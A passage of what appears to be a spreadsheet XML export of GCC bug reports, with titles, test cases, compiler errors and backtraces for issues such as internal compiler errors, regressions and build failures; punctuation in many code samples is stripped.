  CONTAINS
    PROCEDURE PASS :: myproc
  END TYPE t
CONTAINS
  ELEMENTAL INTEGER FUNCTION myproc (me)
    CLASS(t) INTENT(IN) :: me
    myproc = 42
  END FUNCTION myproc
END MODULE m
PROGRAM main
  USE m
  IMPLICIT NONE
  TYPE(t) :: arr(2)
  PRINT * arr%myproc ()
END PROGRAM main
[/tmp]# gfortran-dev elemental.f03  -w
elemental.f03:23.10:
  PRINT * arr%myproc ()
          1
Error: Passed-object at (1) must be scalar
This is a wrongly placed check actually on the declaration it should be checked that the passed-object dummy argument is scalar non-pointer and non-allocatable but that check is in turn missing this one is accepted but is illegal:
MODULE m
  IMPLICIT NONE
  TYPE t
  CONTAINS
    PROCEDURE PASS :: proc1
    PROCEDURE PASS :: proc2
  END TYPE t
CONTAINS
  INTEGER FUNCTION proc1 (me)
    CLASS(t) INTENT(IN) :: me(:)
    proc1 = 42
  END FUNCTION proc1
  INTEGER FUNCTION proc2 (me)
    CLASS(t) INTENT(IN) POINTER :: me
    proc2 = 42
  END FUNCTION proc2
  ! ALLOCATABLE scalar can't be checked but is the same.
END MODULE m</t>
  </si>
  <si>
    <t>GCC-11495</t>
  </si>
  <si>
    <t>[3.4 regression] Two-stage name lookup not Koenig-aware</t>
  </si>
  <si>
    <t>Found while looking at 11493:
Another recent regression -- this code
------------------------
namespace NS {
    struct C {}
    void foo(C)
}
template  void bar() { T t foo (t) }
template void bar ()
-------------------------
should be legal: foo(t) is a dependent call so foo should be looked up
at instantiation time and then Koenig lookup applies to find NS::foo.
In fact recent gccs compiled this just fine but with tonight's snapshot
it doesn't anymore:
tmp/gg&gt; ../build-gcc/gcc-install/bin/c++ -c x.cc
x.cc: In function `void bar() [with T = NS::C]':
x.cc:8:   instantiated from here
x.cc:6: error: `foo' undeclared (first use this function)
x.cc:6: error: (Each undeclared identifier is reported only once for each
   function it appears in.)
:256: error: `' is not a function
x.cc:3: error:   conflict with `void NS::foo(NS::C)'
x.cc:6: error:   in call to `foo'
What is also pretty funny is the third to last line. This usually indicates
a built-in function but how can a builtin have a declaration error? And
how can it conflict?
W.</t>
  </si>
  <si>
    <t>GCC-79020</t>
  </si>
  <si>
    <t>translatable string typo in params.def:1173</t>
  </si>
  <si>
    <t>Use direct poisoning/unpoisoning intructions for variables smaller or equal to this number.
There is a missing letter in instructions.
Message found in ftp://gcc.gnu.org/pub/gcc/snapshots/7-20170101/gcc-7-20170101.tar.bz2 proposed to translators.</t>
  </si>
  <si>
    <t>GCC-42345</t>
  </si>
  <si>
    <t>cannot force 32 bit toolchain only</t>
  </si>
  <si>
    <t>On:
2.6.31.6-162.fc12.x86_64
I configure:
$src/gcc-trunk/configure --prefix=$bld/H-i686-gcc --enable-languages=cc++ --enable-checking=release --with-cpu=i686 --target=i686-unknown-linux-gnu --disable-multilib 
Thinking this will give me a 32-bit defaulting i686 compiler. 
Gives:
checking for i686-unknown-linux-gnu-gcc... /mnt/share/bld/gcc-i686/./gcc/xgcc -B/mnt/share/bld/gcc-i686/./gcc/ -B/mnt/share/bld/H-i686-gcc/i686-unknown-linux-gnu/bin/ -B/mnt/share/bld/H-i686-gcc/i686-unknown-linux-gnu/lib/ -isystem /mnt/share/bld/H-i686-gcc/i686-unknown-linux-gnu/include -isystem /mnt/share/bld/H-i686-gcc/i686-unknown-linux-gnu/sys-include   
checking for suffix of object files... configure: error: in `/mnt/share/bld/gcc-i686/i686-unknown-linux-gnu/libgcc':
configure: error: cannot compute suffix of object files: cannot compile
See `config.log' for more details.
I've attached config.log. 
Is there a supported set of config options for this?</t>
  </si>
  <si>
    <t>GCC-44839</t>
  </si>
  <si>
    <t>[4.6 regression] FAIL: c-c++-common/uninit-17.c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 161849 gave:
FAIL: c-c++-common/uninit-17.c  (test for warnings line 14)
FAIL: c-c++-common/uninit-17.c  -Wc++-compat   (test for warnings line 14)
FAIL: c-c++-common/uninit-17.c  -Wc++-compat  (test for excess errors)
FAIL: c-c++-common/uninit-17.c (test for excess errors)
Revision 161840 is OK.</t>
  </si>
  <si>
    <t>GCC-12632</t>
  </si>
  <si>
    <t>[g77 3.3/3.4 Regression] [g77 only] -fbounds-check ICE</t>
  </si>
  <si>
    <t>The following test.f makes an ICE.
      INTEGER I(1)
      I(2) = 0
      END
Environment:
System: Linux 2.2.19
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ./configure --enable-languages=f77
How-To-Repeat:
g77 -fbounds-check test.f</t>
  </si>
  <si>
    <t>susukita</t>
  </si>
  <si>
    <t>GCC-37049</t>
  </si>
  <si>
    <t>Unaligned move used on aligned  destination of push insn</t>
  </si>
  <si>
    <t>[hjl@gnu-3 gcc]$ cat /tmp/push-1.c 
/* { dg-do compile { target { { i?86-*-* x86_64-*-* } &amp;&amp; ilp32 } } } */
/* { dg-options -w -msse2 -Os } */
typedef float __m128 __attribute__ ((__vector_size__ (16) __may_alias__))
extern void foo (__m128 x __m128 y __m128 z __m128 a int size)
void
bar (void)
{
  __m128 x = { 1.0 }
  foo (x x x x 5)
}
/* { dg-final { scan-assembler-not movups } } */
[hjl@gnu-3 gcc]$ ./xgcc -B./ -Os -m32 -msse2 -S /tmp/push-1.c
[hjl@gnu-3 gcc]$ cat push-1.s 
	.file	push-1.c
	.text
.globl bar
	.type	bar @function
bar:
	pushl	%ebp
	movl	%esp %ebp
	subl	$20 %esp
	movss	.LC0 %xmm0
	pushl	$5
	subl	$16 %esp
	movups	%xmm0 (%esp)
	movaps	%xmm0 %xmm2
	movaps	%xmm0 %xmm1
	call	foo
	addl	$32 %esp
	leave
	ret
-mno-accumulate-outgoing-args will push argument onto stack.
Since there is no push insn for __m128 ix86_expand_push is
called to emulate push __m128. But it doesn't set proper
alignment. As the result unaligned move insn is generated
even though memory is aligned.  Since ix86_expand_push is
used to push a value onto an aligned location on the stack
the alignment of destination should be at least aligned to
function argument boundary which is the minimum alignment
of push destination.</t>
  </si>
  <si>
    <t>GCC-50837</t>
  </si>
  <si>
    <t>[c++0x] static_assert and constexpr in template class</t>
  </si>
  <si>
    <t>error: `'static constexpr bool z::test_constexpr() [with T = int]' cannot appear in a constant-expression`
adding `z::` before `test_constexpr` fix it
------------------------------------------------------
template
struct z
{
	static constexpr bool test_constexpr()
	{
		return true
	}
	static bool test()
	{
		static_assert(test_constexpr() test1)//error here
		return true
	}
}
int main()
{
	z::test()
}
------------------------------------------------------</t>
  </si>
  <si>
    <t>trashyankes</t>
  </si>
  <si>
    <t>GCC-57233</t>
  </si>
  <si>
    <t>Vector lowering of LROTATE_EXPR pessimizes code</t>
  </si>
  <si>
    <t>Hello
the vector lowering pass when it sees a rotate on a vector that is not a supported operation lowers it to scalar rotates. However from a quick look at the RTL expanders (untested) they know how to handle a vector rotate as long as shifts and ior are supported and that would yield better code than the scalar ops. So I think the vector lowering pass should not just check if rotate is supported but also if shift and ior are before splitting the operation.
typedef unsigned vec __attribute__((vector_size(4*sizeof(int))))
vec f(vec a){
  return (a&gt;30)
}
without rotate:
	vpsrld	$30 %xmm0 %xmm1
	vpslld	$2 %xmm0 %xmm0
	vpor	%xmm0 %xmm1 %xmm0
with a patch that recognizes rotate for vectors:
	vpextrd	$2 %xmm0 %edx
	vmovd	%xmm0 %eax
	rorx	$30 %eax %eax
	movl	%eax -16(%rsp)
	rorx	$30 %edx %ecx
	vpextrd	$1 %xmm0 %eax
	movl	%ecx -12(%rsp)
	vmovd	-16(%rsp) %xmm3
	vpextrd	$3 %xmm0 %edx
	vmovd	-12(%rsp) %xmm2
	rorx	$30 %eax %eax
	rorx	$30 %edx %edx
	vpinsrd	$1 %eax %xmm3 %xmm1
	vpinsrd	$1 %edx %xmm2 %xmm0
	vpunpcklqdq	%xmm0 %xmm1 %xmm0
(I am not sure all those ext/ins are optimal I would have expected one mov from xmm0 to memory then the scalar rotates are done and write to memory again and one final mov back to the FPU but my intuition may be wrong)</t>
  </si>
  <si>
    <t>GCC-6517</t>
  </si>
  <si>
    <t>gcc hangs on C compile with multiple -I-</t>
  </si>
  <si>
    <t>gcc 3.0.4 hangs when multiple -I- options are given on a C compile
line.  I cannot include preprocessor output since none is produced
due to the hanging.  Here is the command that was run along with the
output produced before gcc hung:
  % sparc-sun-solaris2.8-gcc -I- -I- hello-world.c
  cc1: -I- specified twice
Release:
3.0.4
Environment:
AIX 4.3.3.0 cross compiling for solaris2.8
System: AIX f80 3 4 000F0FBD4C00
host: powerpc-ibm-aix4.3.3.0
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.0.4/configure --target=sparc-sun-solaris2.8
--prefix=/host/f/aix433/cross-sol28 --enable-languages=c
--with-local-prefix=/host/f/aix433/cross-sol28/sparc-sun-solaris2.8
--with-gnu-as --with-gnu-ld
How-To-Repeat:
Run a command line similar to the one shown above.  The C file does
not matter since it never gets that far.  I cannot provide the
preprocessor output as none is produced.  However here is the
output when the same command is run with -v and -save-temps (this
actually does not hang):
  % sparc-sun-solaris2.8-gcc -v -save-temps -I- -I- hello-world.c
  Reading specs from
  /host/f/aix433/cross-sol28/lib/gcc-lib/sparc-sun-solaris2.8/3.0.4/specs
  Configured with: ../gcc-3.0.4/configure --target=sparc-sun-solaris2.8
  --prefix=/host/f/aix433/cross-sol28 --enable-languages=c
  --with-local-prefix=/host/f/aix433/cross-sol28/sparc-sun-solaris2.8
  --with-gnu-as --with-gnu-ld
  Thread model: posix
  gcc version 3.0.4
   /host/f/aix433/cross-sol28/lib/gcc-lib/sparc-sun-solaris2.8/3.0.4/cpp0 -lang\
-c -v -I- -I- -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=4 -Dsparc -\
Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D_\
_SVR4 -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D__NO_INLINE__ -D\
__STDC_HOSTED__=1 -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc hello-world\
.c hello-world.i
  cpp0: -I- specified twice
  ========== RETURN CODE: 1</t>
  </si>
  <si>
    <t>GCC-70310</t>
  </si>
  <si>
    <t>[6 Regression] wrong code with vector compare at -O0</t>
  </si>
  <si>
    <t>Created attachment 38029
reduced testcase
Output:
$ gcc -O0 testcase.c
$ ./a.out 
000000ff
Aborted
$ gcc -v            
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-234340-checking-yes-rtl-df-nobootstrap-nographite/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --disable-bootstrap --without-cloog --without-ppl --without-isl --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-234340-checking-yes-rtl-df-nobootstrap-nographite
Thread model: posix
gcc version 6.0.0 20160318 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-69916</t>
  </si>
  <si>
    <t>[openacc] ICE in single_succ_edge called from oacc_loop_xform_loop</t>
  </si>
  <si>
    <t>$ cat loop-clauses.c
int
main (void)
{
#pragma acc parallel
  {
    int j
#pragma acc loop private (j)
    for (int i = 0 i &lt; 10 i++)
      j++
  }
  return 0
}
$ gcc loop-clauses.c -fopenacc -S -O2 
loop-clauses.c: In function â€˜main._omp_fn.0â€™:
loop-clauses.c:5:9: internal compiler error: in single_succ_edge at basic-block.h:351
 #pragma acc parallel
         ^~~
0xcf6d90 single_succ_edge
	src/gcc/basic-block.h:351
0xcf6e0e single_succ
	src/gcc/basic-block.h:371
0xd4eece oacc_loop_xform_loop
	src/gcc/omp-low.c:20759
0xd4ef9f oacc_loop_process
	src/gcc/omp-low.c:20781
0xd4ef2e oacc_loop_process
	src/gcc/omp-low.c:20771
0xd4f888 execute_oacc_device_lower
	src/gcc/omp-low.c:21085
0xd4fd74 execute
	src/gcc/omp-low.c:21268
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-32336</t>
  </si>
  <si>
    <t>matmul: flag runtime- instead of assertation error</t>
  </si>
  <si>
    <t>$&gt; gfortran-svn  -g -pg -O0 -Wall -Wimplicit-interface -Wunderflow -Wsurprising -fbounds-check -fimplicit-none -ffpe-trap=invalidzero -fbacktrace ...
[list-of-objects]
a.out: ../../../../svn/gcc/libgfortran/generated/matmul_r8.c:172: matmul_r8: Assertion `count == b-&gt;dim[0].ubound + 1 - b-&gt;dim[0].lbound' failed.
Aborted
The call to MATMUL obviously is erroneous but a runtime error instead of an assertation would be preferable in this case.</t>
  </si>
  <si>
    <t>GCC-659</t>
  </si>
  <si>
    <t>Letter in the way of a struct-function-declaration - ICE #19990916.</t>
  </si>
  <si>
    <t>Letters are seemingly unhealthy (though they sound like 'lettuce'...)
I get ICE #19990916 when putting a letter in a bad place as shown.
Release:
cc version 2.96 20000731 (experimental)
How-To-Repeat:
struct S2 {
    f() a // &lt;-- 'S2() a' also does it
}
// I really should stop writing illegal code.</t>
  </si>
  <si>
    <t>GCC-11455</t>
  </si>
  <si>
    <t>Bootstrap failure in Cygwin</t>
  </si>
  <si>
    <t>GCC 3.4 under Cygwin currently fails due to incorrect format specifiers in
config/i386/winnt.c
The cause of this failure was Danny Smith's patch located at
http://gcc.gnu.org/ml/gcc-patches/2003-06/msg01681.html which uses %D.
According to Kaveh Ghzazi the use of %D is likely incorrect.  But in case it
is correct he gives pointers on how to correct it if here:
http://gcc.gnu.org/ml/gcc/2003-07/msg00484.html</t>
  </si>
  <si>
    <t>GCC-69028</t>
  </si>
  <si>
    <t>ICE on *any* valid Cilk+ code C/C++: Invalid read of size 2 in cp_dump_tree(void* tree_node*) (dump.c:318)</t>
  </si>
  <si>
    <t>I have found that Cilk+ programs are basically unusable with `--coverage` irrespective of whether it's a C or C++ program therefore I'm marking this as a driver issue.
Additionally I set the severity to major because I haven't found any indication that profiling is unsupported with Cilk+ runtime and it's arguably one of the fundamental features of the compiler. In comparison OpenMP runtime certainly does support profiling.
Affected are GCC 4.9 and GCC 5.x I didn't have a chance to try on GCC 6 / trunk.
$ cat ice.c 
#include 
void parallel() {
}
int main() {
    cilk_spawn parallel()
    cilk_sync
}
$ gcc-4.9 -fcilkplus ice.c
$ g++-4.9 -fcilkplus ice.c
$ gcc-5 -fcilkplus ice.c
$ g++-5 -fcilkplus ice.c
$ gcc-4.9 -fcilkplus -fprofile-arcs ice.c 
ice.c: In function '_cilk_spn_0':
ice.c:9:1: internal compiler error: Segmentation fault
 }
 ^
$ g++-4.9 -fcilkplus -fprofile-arcs ice.c 
ice.c: In function '':
ice.c:9:1: internal compiler error: Segmentation fault
 }
 ^
$ gcc-5 -fcilkplus -fprofile-arcs ice.c 
ice.c:9:1: internal compiler error: Segmentation fault
 }
 ^
0x9a106f crash_signal
	../../src/gcc/toplev.c:383
0x6b688f coverage_checksum_string
	../../src/gcc/coverage.c:542
0x6b7a86 coverage_compute_profile_id(cgraph_node*)
	../../src/gcc/coverage.c:625
0xb8ef3e init_node_map(bool)
	../../src/gcc/value-prof.c:1308
0xa37b1e tree_profiling
	../../src/gcc/tree-profile.c:545
0xa37b1e execute
	../../src/gcc/tree-profile.c:670
$ g++-5 -fcilkplus -fprofile-arcs ice.c 
ice.c:9:1: internal compiler error: Segmentation fault
 }
 ^
0xa8842f crash_signal
	../../src/gcc/toplev.c:383
0x79c71f coverage_checksum_string
	../../src/gcc/coverage.c:542
0x79d916 coverage_compute_profile_id(cgraph_node*)
	../../src/gcc/coverage.c:625
0xc75cae init_node_map(bool)
	../../src/gcc/value-prof.c:1308
0xb1ed3e tree_profiling
	../../src/gcc/tree-profile.c:545
0xb1ed3e execute
	../../src/gcc/tree-profile.c:670
$ gcc-5 --version
gcc-5 (Ubuntu 5.2.1-23ubuntu1~12.04) 5.2.1 20151031
$ gcc-4.9 --version
gcc-4.9 (Ubuntu 4.9.2-0ubuntu1~12.04) 4.9.2</t>
  </si>
  <si>
    <t>yury.zaytsev</t>
  </si>
  <si>
    <t>GCC-3220</t>
  </si>
  <si>
    <t>ICE in subreg_highpart_offset at emit-rtl.c:1171</t>
  </si>
  <si>
    <t>../gcc/configure --prefix=/usr/local/gcc/java --with-cpu=ultrasparc --enable-languages=c++java &amp;&amp;
make CFLAGS=-O2 'LIBCFLAGS=-g -O2' 'LIBCXXFLAGS=-g -O2 -fno-implicit-templates' bootstrap
...
/export/home/ask/build/gcc-build-java/gcc/gcj -B/export/home/ask/build/gcc-build-java/sparc-sun-solaris2.6/libjava/ -B/export/home/ask/build/gcc-build-java/gcc/ --encoding=UTF-8 -fassume-compiled -fclasspath=/export/home/ask/build/gcc-build-java/sparc-sun-solaris2.6/libjava -L/export/home/ask/build/gcc-build-java/sparc-sun-solaris2.6/libjava -g -O2 -MD -MT gnu/gcj/math/MPN.lo -MF gnu/gcj/math/MPN.d -c ../../../gcc/libjava/gnu/gcj/math/MPN.java -fPIC -o gnu/gcj/math/.libs/MPN.o
../../../gcc/libjava/gnu/gcj/math/MPN.java: In class `gnu.gcj.math.MPN':
../../../gcc/libjava/gnu/gcj/math/MPN.java: In method `gnu.gcj.math.MPN.add_1(int[]int[]intint)':
../../../gcc/libjava/gnu/gcj/math/MPN.java:712: Internal compiler error in subreg_highpart_offset at emit-rtl.c:1171
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [gnu/gcj/math/MPN.lo] Error 1
make[3]: Leaving directory `/export/home/ask/build/gcc-build-java/sparc-sun-solaris2.6/libjava'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/export/home/ask/build/gcc-build-java/sparc-sun-solaris2.6/libjava'
make[1]: *** [all-target-libjava] Error 2
make[1]: Leaving directory `/export/home/ask/build/gcc-build-java'
make: *** [bootstrap] Error 2
Release:
3.1 20010617
Environment:
SunOS iridium 5.6 Generic_105181-20 sun4u sparc SUNWUltra-5_10</t>
  </si>
  <si>
    <t>GCC-81084</t>
  </si>
  <si>
    <t>[8 Regression] powerpcspe port full of confusing configury / command-line options not related to SPE</t>
  </si>
  <si>
    <t>Docs and port needs some axe otherwise we should not release it.</t>
  </si>
  <si>
    <t>andrewjenner</t>
  </si>
  <si>
    <t>GCC-1825</t>
  </si>
  <si>
    <t>parse error results in Tree check: expected class 't' have 'x' (error_mark)</t>
  </si>
  <si>
    <t>The following illegal source code a semicolon is missing after using
namespace std generates Tree check: expected class 't' have 'x'
(error_mark).
Release:
2.97 20010129 (experimental)
Environment:
System: Linux kiste 2.4.0 #25 Tue Jan 16 01:22:25 CET 2001 i686 unknown
Architecture: i686
glibc 2.1.3
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-nls --enable-shared
How-To-Repeat:
tbug3.C
typedef struct
{
  int count	
  int value	
} mbstate_t
namespace std {
  typedef long  	streamoff
  typedef long	        streamsize 
}
namespace std {
    template
    class fpos
    {
    public:
      typedef _StateT __state_type
    private:
      __state_type 	_M_st
      streamoff 	_M_off
    public:
      __state_type
      state() const  { return _M_st }
      fpos(): _M_st(__state_type()) _M_off(streamoff()) { }
    }
}  // namespace std
namespace std {
    typedef fpos 	streampos
    template
    struct char_traits
    {
      typedef streampos 	pos_type
      typedef mbstate_t 	state_type
      static state_type 
      _S_get_state(const pos_type }
    }
  template
    struct char_traits
    {
      typedef streampos 	pos_type
      typedef mbstate_t 	state_type
      static state_type 
      _S_get_state(const pos_type }
  }
} // namespace std
using namespace std
int main (){ }
Compiling the source file tbug3.C
g++ -v -o tbug3 tbug3.C -W -Wall
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --disable-nls --enable-shared --enable-threads=posix
gcc version 2.97 20010129 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1plus -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tbug3.C -D__GNUG__=2 -D_GNU_SOURCE -D__GXX_ABI_VERSION=100 -quiet -dumpbase tbug3.C -W -Wall -version -o /tmp/ccqo5yzw.s
GNU CPP version 2.97 20010129 (experimental) (cpplib) (i386 Linux/ELF)
GNU CPP version 2.97 20010129 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 2.97 20010129 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010129 (experimental).
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/i686-pc-linux-gnu/include/g++-v3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
tbug3.C:65: parse error before `int'
tbug3.C: In member function `_StateT std::fpos::state() const [with 
   _StateT = mbstate_t]':
tbug3.C:56:   instantiated from here
tbug3.C:28: `this' undeclared (first use this function)
tbug3.C:28: (Each undeclared identifier is reported only once for each function 
   it appears in.)
tbug3.C:28: Tree check: expected class 't' have 'x' (error_mark)
confused by earlier errors bailing out
Preprocessor source file: tbug3.ii
# 1 tbug3.C
typedef struct
{
  int count
  int value
} mbstate_t
namespace std {
  typedef long streamoff
  typedef long streamsize
}
namespace std {
    template
    class fpos
    {
    public:
      typedef _StateT __state_type
    private:
      __state_type _M_st
      streamoff _M_off
    public:
      __state_type
      state() const { return _M_st }
      fpos(): _M_st(__state_type()) _M_off(streamoff()) { }
    }
}
namespace std {
    typedef fpos streampos
    template
    struct char_traits
    {
      typedef streampos pos_type
      typedef mbstate_t state_type
      static state_type
      _S_get_state(const pos_type }
    }
  template
    struct char_traits
    {
      typedef streampos pos_type
      typedef mbstate_t state_type
      static state_type
      _S_get_state(const pos_type }
  }
}
using namespace std
int main (){ }</t>
  </si>
  <si>
    <t>GCC-41967</t>
  </si>
  <si>
    <t>gcc get into endless loop when compiling an openmp program</t>
  </si>
  <si>
    <t>Hi
  Compile the following simple program using g++ -fopenmp filename.cpp g++ output infinite lines of Error: expected Ð±Ð¾}Ð±Ð¿ at end of input. 
===code====
#include 
#include 
#include 
int main() {
	#pragma omp parallel num_threads(4)
	{
		int sum = 0
		#pragma omp for collapse(2)
		for(int i = 0 i &lt; 100 ++i) {
			for(int j = 0 j &lt; 100 ++j) {
				++sum
			}
			++sum
		}
		printf(%d:%d\n omp_get_thread_num() sum)
	}
	return 0
}
===code====</t>
  </si>
  <si>
    <t>tarlou.gd</t>
  </si>
  <si>
    <t>GCC-67756</t>
  </si>
  <si>
    <t>[6 Regression] ICE compiling Linux Kernel fs/namei.c on ARM</t>
  </si>
  <si>
    <t>arm-linux-gnueabihf-gcc -v
Using built-in specs.
COLLECT_GCC=arm-linux-gnueabihf-gcc
COLLECT_LTO_WRAPPER=/home/ed/gnu/arm-linux-gnueabihf-linux64/libexec/gcc/arm-linux-gnueabihf/6.0.0/lto-wrapper
Target: arm-linux-gnueabihf
Configured with: ../gcc-6-20150927/configure --prefix=/home/ed/gnu/arm-linux-gnueabihf-linux64 --target=arm-linux-gnueabihf --enable-languages=cc++fortranada --with-arch=armv7-a --with-tune=cortex-a9 --with-fpu=vfpv3-d16 --with-float=hard
Thread model: posix
gcc version 6.0.0 20150927 (experimental) (GCC) 
arm-linux-gnueabihf-gcc -Wp-MDfs/.namei.o.d  -nostdinc -isystem /home/ed/gnu/arm-linux-gnueabihf-linux64/lib/gcc/arm-linux-gnueabihf/6.0.0/include -I./arch/arm/include -Iarch/arm/include/generated  -Iinclude -I./arch/arm/include/uapi -Iarch/arm/include/generated/uapi -I./include/uapi -Iinclude/generated/uapi -include ./include/linux/kconfig.h -D__KERNEL__ -mlittle-endian -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -std=gnu89 -fno-dwarf2-cfi-asm -fno-omit-frame-pointer -mapcs -mno-sched-prolog -mabi=aapcs-linux -mno-thumb-interwork -mfpu=vfp -funwind-tables -marm -D__LINUX_ARM_ARCH__=7 -march=armv7-a -msoft-float -Uarm -fno-delete-null-pointer-checks -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector -Wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -g -pg -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-overflow -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -DCC_HAVE_ASM_GOTO    -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(namei)  -DKBUILD_MODNAME=KBUILD_STR(namei) -c -o fs/namei.o fs/namei.c
fs/namei.c: In function 'vfs_link':
fs/namei.c:3934:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 85 281 86 12 (parallel [
            (set (reg/v:SI 1 r1 [orig:113 max_links ] [113])
                (and:SI (ne:SI (reg/v:SI 1 r1 [orig:113 max_links ] [113])
                        (const_int 0 [0]))
                    (leu:SI (reg/v:SI 1 r1 [orig:113 max_links ] [113])
                        (reg:SI 2 r2 [orig:125 _25 ] [125]))))
            (clobber (reg:CC 100 cc))
        ]) fs/namei.c:3917 262 {*and_scc_scc_nodom}
     (nil))
fs/namei.c:3934:1: internal compiler error: in extract_constrain_insn at recog.c:2200
0xa3db48 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc-6-20150927/gcc/rtl-error.c:109
0xa3db6f _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc-6-20150927/gcc/rtl-error.c:120
0xa1028d extract_constrain_insn(rtx_insn*)
	../../gcc-6-20150927/gcc/recog.c:2200
0x9efc9d reload_cse_simplify_operands
	../../gcc-6-20150927/gcc/postreload.c:408
0x9f29b5 reload_cse_simplify
	../../gcc-6-20150927/gcc/postreload.c:194
0x9f29b5 reload_cse_regs_1
	../../gcc-6-20150927/gcc/postreload.c:233
0x9f2acb reload_cse_regs
	../../gcc-6-20150927/gcc/postreload.c:81
0x9f2acb execute
	../../gcc-6-20150927/gcc/postreload.c:2350
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-30546</t>
  </si>
  <si>
    <t>[4.2/4.3 regression] build fail in libgomp when building from SVN because makeinfo is missing</t>
  </si>
  <si>
    <t>While it was bootstrapping fine on 2006-10-21 mainline now fails to build on my mingw setup because libgomp wants to run makeinfo which I don't have. It says make can be buggy but it's not (it's GNU make 3.79.1).
if /home/coudert/trunk/missing makeinfo --split-size=5000000  -I ../../../trunk/libgomp/../gcc/doc/include -I ../../../trunk/libgomp \
 -o libgomp.info `test -f 'libgomp.texi' || echo '../../../trunk/libgomp/'`libgomp.texi \
then \
  rc=0 \
else \
  rc=$? \
  $restore $backupdir/* `echo ./libgomp.info | sed 's|[^/]*$||'` \
fi \
rm -rf $backupdir exit $rc
WARNING: `makeinfo' is missing on your system.  You should only need it if
         you modified a `.texi' or `.texinfo' file or any other file
         indirectly affecting the aspect of the manual.  The spurious
         call might also be the consequence of using a buggy `make' (AIX
         DU IRIX).  You might want to install the `Texinfo' package or
         the `GNU make' package.  Grab either from any GNU archive site.
make[2]: *** [libgomp.info] Error 1
make[2]: Leaving directory `/home/coudert/ibin/i386-pc-mingw32/libgomp'</t>
  </si>
  <si>
    <t>GCC-50371</t>
  </si>
  <si>
    <t>[C++0x] std::nullptr_t rejected as non-type template-parameter</t>
  </si>
  <si>
    <t>This is a placeholder entry to add support for std::nullptr_t as non-type template-parameter (14.1 p4).
gcc 4.7.0 20110903 (experimental) in C++0x mode rejects the following code:
template
struct nt
error: 'std::nullptr_t' is not a valid type for a template constant parameter
The code should be accepted.</t>
  </si>
  <si>
    <t>GCC-60432</t>
  </si>
  <si>
    <t>Member pointer resolution within class definition causes segmentation fault</t>
  </si>
  <si>
    <t>jpelletier</t>
  </si>
  <si>
    <t>GCC-33196</t>
  </si>
  <si>
    <t>Generic name to non-standard procedure: Not diagnosed with -std=f95</t>
  </si>
  <si>
    <t>gfortran.dg/gamma_2.f90 (of PR 32980) contains:
+! { dg-options -std=f2003 -Wall }
+rsp = gamma(rsp)  ! FIXME:  is not included in the selected standard
+rdp = gamma(rdp)  ! FIXME:  is not included in the selected standard
+rqp = gamma(rqp)  ! FIXME:  is not included in the selected standard
+rdp = dgamma(rdp) ! { dg-error is not included in the selected standard }
As one can see only for the specific name (dgamma) there is an error with -std=f2003 but not for the generic name.
The definition contains the proper STD_GNU:
add_sym_1 (gamma [...] GFC_STD_GNU [...]
add_sym_1 (dgamma [...] GFC_STD_GNU [...]
make_generic (gamma GFC_ISYM_GAMMA GFC_STD_GNU)</t>
  </si>
  <si>
    <t>GCC-53448</t>
  </si>
  <si>
    <t>[avr] ignoring __attribute__((aligned(2)))</t>
  </si>
  <si>
    <t>int var __attribute__((aligned(2))) = 1
gets compiled to
.global	var
	.data
	.type	var @object
	.size	var 2
var:
	.word	1
i.e. the alignment directive .p2align 1 is missing.</t>
  </si>
  <si>
    <t>GCC-52101</t>
  </si>
  <si>
